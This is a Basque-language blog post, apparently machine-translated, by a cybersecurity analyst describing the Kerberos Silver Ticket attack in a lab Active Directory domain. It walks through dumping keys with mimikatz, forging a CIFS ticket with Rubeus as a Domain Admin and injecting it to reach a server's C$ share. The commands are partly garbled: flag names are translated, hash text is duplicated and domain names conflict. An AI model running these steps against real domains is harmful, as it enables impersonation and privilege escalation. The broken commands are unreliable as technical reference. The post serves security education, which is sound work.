Tickets Kerberos - Silver Ticket

Sarrerak Kerberos - Zilarrezko Sarrera


Kerberos Ticketen bidalketekin jarraituz, iraganeko argitalpenetan Urrezko Txartelaz hitz egin dugu, oraingoan Zilarrezko Txartelaz arituko gara.

ZILARREZKO SARRERA

Silver Ticket erasoak Ticket Granting Service (TGS) sortzea dakar, eta horri esker, erasotzaileek Active Directory ingurunean zerbitzu jakin batera sarbidea izan dezakete domeinu-kontrolatzailearen bidez (Key Distribution Center, KDC) autentifikatu beharrik gabe.

Metodo hau zerbitzu-kontu baten NTLM hash edo pasahitza eskuratzean oinarritzen da, Ticket Emate Zerbitzua (TGS) bat sortzeko. Kredentzial hauek modu ezberdinetan lor daitezke Domeinuaren erasoan, esate baterako, Responder bezalako tresnen bidez edo Kerberoasting tekniken bidez. Txartel faltsu hau sortu ondoren, erasotzaile batek zerbitzu zehatzera sar dezake, edozein erabiltzaile gisa agertuz, normalean administrazio-pribilegioak lortzeko helburuarekin.

Kredentzialak testu garbian edo NTLM hashean lortu beharrean, AES gakoak lor daitezke (adibidez, memoria-iraulketa baten bidez), AES gako hauek erabiltzea gomendatzen da txartelak sortzeko, seguruagoa eta seguruagoa baita. modu ez hain antzemangarria.

Explotazioa:

Lehenik eta behin, demagun saio bat SISTEMA gisa lortu dugula domeinuko makina batean. Hau, adibidez, IIS zerbitzari bat arriskuan jarri eta gero pribilegioak handitu ondoren Potato ustiapena erabiliz gertatu zitekeen.

Zerbitzariaren kontrola lortu ondoren, Kerberos gakoak lor ditzakegu mimikatz-ekin eta sekurlsa::ekeys komandoarekin



Txartelak sortzea

Kerberos gakoak lortu ondoren, zerbitzariaren beraren CIFS zerbitzurako txartel bat sor dezakegu, eta horrek nahi dugun domeinuaren erabiltzaile gisa bertara sartzeko aukera bermatuko digu. Kasu honetan txartela sortuko dugu komandoarekin:

Rubeus.exe silver /service:cifs/castelblack.north.servingkingdom.local/aes256:0ad6c98bbba174b0b2f8d9a05279fe6892cef5f0e1bab59e01b5510e9920774d/user: /eddardom.174b0b2f8d9a05279fe6892cef5f0e1bab59e01b5510e9920774d/user: /serving -1430251130-2586379517-4083755373 /orain bildu



  • Zerbitzua: txartela eskatuko zaion zerbitzuaren izena
  • Aes256: Aurretik ateratako makina-kontuaren Aes256 gakoa
  • Erabiltzailea: inpertsonalizatuko den erabiltzailea, kasu honetan Domeinu Administratzailea
  • Domeinua: Domeinu izena
  • Sid: domeinuaren SID

Inportatu txartela

Tiketa lortutakoan, gure erabiltzaile ez-pribilegiatuen kontsolatik zerbitzarirako administrazio-sarbiderik ez dugula egiaztatu ahal izango dugu.

ls \\castelblack.north.sevenkingdoms.local\C$



Hurrengo urratsa aurretik sortutako txartela prozesu berri batera inportatzea izango da. Hau komandoarekin lor daiteke:

Rubeus.exe createnetonly /programa:C:\Windows\System32\cmd.exe /domeinua:NORTH /erabiltzaile izena: eddard.stark /pasahitza:PassFake /ticket: doIGGDCC[…]b2NhbA==


  • Programa: Tiketa non injektatuko den exekutatzeko komandoa
  • Domeinua: Domeinu izena
  • Erabiltzaile izena: Domeinuaren erabiltzailea
  • Pasahitza: Erabiltzailearen pasahitza. Ez da beharrezkoa erabiltzailearen benetako pasahitza jakitea.
  • Ticket: Aurretik sortutako txartela
Gure Zilarrezko Ticketarekin prozesua sortu ondoren, orain kasuan kasuko zerbitzarian sar gaitezke CIFS zerbitzuaren bidez pribilegiorik gabeko gure erabiltzaile-saiotik.
ls \\castelblack.north.sevenkingdoms.local\c$


Mugak:

Zilarrezko Txartelak sortu den zerbitzu zehatzerako soilik balio du. Ez du onartzen beste zerbitzu edo baliabide batzuetarako sarbidea.

Eta honekin bukatzen dugu mezua, zentzu horretan orain badakigu Zilarrezko Txartela eta Urrezko Txartela , Kerberos txartel hauei buruzko zati bat gehiago zain dago. Hurrengo txartelera arte.

Álvaro Temes , Zerolynxeko zibersegurtasun analista .

Itzuli blogera

Utzi iruzkin bat

Kontuan izan iruzkinak argitaratu aurretik onartu behar direla.